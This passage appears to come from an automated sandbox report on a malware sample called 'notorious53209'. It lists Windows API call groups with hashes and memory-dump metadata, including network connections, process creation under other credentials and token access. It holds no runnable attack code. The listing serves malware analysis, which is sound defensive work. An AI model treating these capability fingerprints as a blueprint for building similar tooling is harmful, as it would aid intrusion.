                                                    • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7B20,?,?,00000000,?,?), ref: 00885BB0
                                                  • _fprintf.LIBCMT ref: 008A0C29
                                                  • OutputDebugStringW.KERNEL32(?), ref: 008D6331
                                                    • Part of subcall function 008A4CDA: _flsall.LIBCMT ref: 008A4CF3
                                                  • __setmode.LIBCMT ref: 008A0C5E
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                  • String ID:
                                                  • API String ID: 521402451-0
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008F1A97
                                                    • Part of subcall function 008F1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008F1B40
                                                    • Part of subcall function 008F1B21: InternetCloseHandle.WININET(00000000), ref: 008F1BDD
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID:
                                                  • API String ID: 1463438336-0
                                                  APIs
                                                    • Part of subcall function 008DF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,008DE1C4,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?), ref: 008DF5BC
                                                    • Part of subcall function 008DF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 008DF5E2
                                                    • Part of subcall function 008DF5AD: lstrcmpiW.KERNEL32(00000000,?,008DE1C4,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?), ref: 008DF613
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 008DE1DD
                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 008DE203
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,008DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 008DE237
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  APIs
                                                  • _free.LIBCMT ref: 008B5351
                                                    • Part of subcall function 008A594C: __FF_MSGBANNER.LIBCMT ref: 008A5963
                                                    • Part of subcall function 008A594C: __NMSG_WRITE.LIBCMT ref: 008A596A
                                                    • Part of subcall function 008A594C: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001), ref: 008A598F
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00884560
                                                    • Part of subcall function 0088410D: _memset.LIBCMT ref: 0088418D
                                                    • Part of subcall function 0088410D: _wcscpy.LIBCMT ref: 008841E1
                                                    • Part of subcall function 0088410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008841F1
                                                  • KillTimer.USER32(?,00000001), ref: 008845B5
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008845C4
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008BD6CE
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008D8B2A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 008D8B31
                                                  • CloseHandle.KERNEL32(00000004), ref: 008D8B4B
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008D8B7A
                                                  Similarity
                                                  • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 2621361867-0
                                                  APIs
                                                    • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7B20,?,?,00000000), ref: 00885B8C
                                                    • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7B20,?,?,00000000,?,?), ref: 00885BB0
                                                  • gethostbyname.WS2_32(?), ref: 008F66AC
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F66B7
                                                  • _memmove.LIBCMT ref: 008F66E4
                                                  • inet_ntoa.WS2_32(?), ref: 008F66EF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                  • String ID:
                                                  • API String ID: 1504782959-0
                                                  • Opcode ID: fd7768601fa0ea7771a01b9975db32ee1289d2181d3e4b6974e98c56dd7403cc
                                                  • Instruction ID: 20d9541b82e1112d87580fe04881e803ab76f7458821861d6c662dd95d4e9450
                                                  • Opcode Fuzzy Hash: fd7768601fa0ea7771a01b9975db32ee1289d2181d3e4b6974e98c56dd7403cc
                                                  • Instruction Fuzzy Hash: F3114936500508AFCB04FBA8DD96DEEB7B8FF14310B148165F502E72A1EB30AE14DB62
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 008D9043
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D9055
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D906B
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D9086
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                                                  • Instruction ID: eba7ee8db19391cf4284538f46b8bbbc3c41f8d7b3e27ec5ec85c3b99ef84c98
                                                  • Opcode Fuzzy Hash: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                                                  • Instruction Fuzzy Hash: C4115E79900218FFDB10DFA5CC84E9DBBB4FB48310F204196E904B7250D6726E11DB90
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E166F
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E1694
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E169E
                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E16D1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: 0756b77c258f17384095d7237fe7e0fbb766df9dae70cdb4793734a8b2f89d65
                                                  • Instruction ID: fc9f193974571f9d959fdfce59cd39a4ea5a7385b3486c454717b959a0e8c529
                                                  • Opcode Fuzzy Hash: 0756b77c258f17384095d7237fe7e0fbb766df9dae70cdb4793734a8b2f89d65
                                                  • Instruction Fuzzy Hash: C7118E31C1851DDBCF00AFA6D848AEEBB78FF1A701F044059E941F6250CB3056A0DBD6
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction ID: 53767d400d4cd41554618c79c3a0b261653988b8827fd90d27f61716387f557b
                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction Fuzzy Hash: 8D01403604428EBBCF125E88CC018EE3F62FF99355F598515FA19A8231D237D9B1AB81
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 0090B59E
                                                  • ScreenToClient.USER32(?,?), ref: 0090B5B6
                                                  • ScreenToClient.USER32(?,?), ref: 0090B5DA
                                                  • InvalidateRect.USER32(?,?,?), ref: 0090B5F5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                  • String ID:
                                                  • API String ID: 357397906-0
                                                  • Opcode ID: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                                                  • Instruction ID: f05e74b1d687279704ef3c71c22d22ef04735e2ee8c22e50959381d1344e4f07
                                                  • Opcode Fuzzy Hash: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                                                  • Instruction Fuzzy Hash: 381134B5D0420DEFDB51CF99C8449EEBBB9FB08310F104166E914E3620D735AA559F50
                                                  APIs
                                                  • _memset.LIBCMT ref: 0090B8FE
                                                  • _memset.LIBCMT ref: 0090B90D
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00947F20,00947F64), ref: 0090B93C
                                                  • CloseHandle.KERNEL32 ref: 0090B94E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3277943733-0
                                                  • Opcode ID: e30687aadd5ad4415d315a37ee83b854c4729965549a37ec2da004a2b0eaac69
                                                  • Instruction ID: 7380a0aa45c8961f8ef8583518254b040ea5670628dcaa560f7bfd91c4be7e0d
                                                  • Opcode Fuzzy Hash: e30687aadd5ad4415d315a37ee83b854c4729965549a37ec2da004a2b0eaac69
                                                  • Instruction Fuzzy Hash: 49F089B55583087FF32027E5AC05F7BBA9CEB0A754F000460BF08D5192D7714D0497A9
                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 008E6E88
                                                    • Part of subcall function 008E794E: _memset.LIBCMT ref: 008E7983
                                                  • _memmove.LIBCMT ref: 008E6EAB
                                                  • _memset.LIBCMT ref: 008E6EB8
                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 008E6EC8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                  • String ID:
                                                  • API String ID: 48991266-0
                                                  • Opcode ID: d03a4d6946ae4f8f2b5d2bf276619f3d3576cfe400702c93d5ac6381f82cb51e
                                                  • Instruction ID: 2ff563a280a9425f64dc05b703cd5e975ba19508b1b4c3c01211b0555b504252
                                                  • Opcode Fuzzy Hash: d03a4d6946ae4f8f2b5d2bf276619f3d3576cfe400702c93d5ac6381f82cb51e
                                                  • Instruction Fuzzy Hash: 63F0543A104200ABCF116F59DC85A49BB29FF46320F048061FE089E217C731E911DBB5
                                                  APIs
                                                    • Part of subcall function 008812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0088134D
                                                    • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088135C
                                                    • Part of subcall function 008812F3: BeginPath.GDI32(?), ref: 00881373
                                                    • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088139C
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0090C030
                                                  • LineTo.GDI32(00000000,?,?), ref: 0090C03D
                                                  • EndPath.GDI32(00000000), ref: 0090C04D
                                                  • StrokePath.GDI32(00000000), ref: 0090C05B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                  • String ID:
                                                  • API String ID: 1539411459-0
                                                  • Opcode ID: c3d69b134f6bf8e75a6385e90c25df539864f2c5917e96e0ec04e26e3ee1a297
                                                  • Instruction ID: 671a20c3f10354cf89c168491093917311302aa815b035f4d8a4f7fba35a30fd
                                                  • Opcode Fuzzy Hash: c3d69b134f6bf8e75a6385e90c25df539864f2c5917e96e0ec04e26e3ee1a297
                                                  • Instruction Fuzzy Hash: 64F0B832018219BFDB226F54AC0AFCE3FA8AF0A310F048100FA11614E287B51661EBE6
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008DA399
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 008DA3AC
                                                  • GetCurrentThreadId.KERNEL32(00000000), ref: 008DA3B3
                                                  • AttachThreadInput.USER32(00000000), ref: 008DA3BA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 2710830443-0
                                                  • Opcode ID: 8bd6403736d547c95e05bc4bd7b5be903607dc2d767f22ede7fcd3b786fd0f54
                                                  • Instruction ID: 00cf035f16c98847c94630c4ea7668f2187005d3baabfbc3e1209d2ed75938ba
                                                  • Opcode Fuzzy Hash: 8bd6403736d547c95e05bc4bd7b5be903607dc2d767f22ede7fcd3b786fd0f54
                                                  • Instruction Fuzzy Hash: EAE0393114932CBADB245BA2DC0CED73F1CFF167A1F008125F508C4560CA72C640EBA0
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00882231
                                                  • SetTextColor.GDI32(?,000000FF), ref: 0088223B
                                                  • SetBkMode.GDI32(?,00000001), ref: 00882250
                                                  • GetStockObject.GDI32(00000005), ref: 00882258
                                                  • GetWindowDC.USER32(?), ref: 008BC0D3
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 008BC0E0
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 008BC0F9
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 008BC112
                                                  • GetPixel.GDI32(00000000,?,?), ref: 008BC132
                                                  • ReleaseDC.USER32(?,00000000), ref: 008BC13D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  • Opcode ID: 15df1d7a2d2dd0e8c4e45ff5dded537f8f9c0e7b9a839cb33ae367b6a0159b7d
                                                  • Instruction ID: f92745601baef6bc5590dad35efcb25da48abddcf3b69455c00245afa14cb4e6
                                                  • Opcode Fuzzy Hash: 15df1d7a2d2dd0e8c4e45ff5dded537f8f9c0e7b9a839cb33ae367b6a0159b7d
                                                  • Instruction Fuzzy Hash: A1E06D32118244EEDFB15F68FC0D7E87B14FB05336F008366FA69980E187714A90EB11
                                                  APIs
                                                  • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,008D86DD,?,?,?,008D882E), ref: 008D8C63
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,008D882E), ref: 008D8C6A
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008D882E), ref: 008D8C77
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,008D882E), ref: 008D8C7E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                                                  • Instruction ID: 00a91701c4ac58f54e635b0223bcb8564acb5719eb4e6d72e87f57029692daca
                                                  • Opcode Fuzzy Hash: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                                                  • Instruction Fuzzy Hash: 59E08636666211DFD7705FB06D0CB563BBCFF50BA2F044828B245D9040DA348545EB71
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 008C2187
                                                  • GetDC.USER32(00000000), ref: 008C2191
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008C21B1
                                                  • ReleaseDC.USER32(?), ref: 008C21D2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: 201b76a954a9f340f8002164829366363f909c75e30f7b12b952621642c211f1
                                                  • Instruction ID: 4bb31af462a836cf4dc669b3aad38e97f7a77ba69e106c0a94633c358a1887db
                                                  • Opcode Fuzzy Hash: 201b76a954a9f340f8002164829366363f909c75e30f7b12b952621642c211f1
                                                  • Instruction Fuzzy Hash: FFE0E575814618EFDF51AFA4C818AAD7BB1FB4C350F108429F95AD7660CB399241AF40
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 008C219B
                                                  • GetDC.USER32(00000000), ref: 008C21A5
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008C21B1
                                                  • ReleaseDC.USER32(?), ref: 008C21D2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
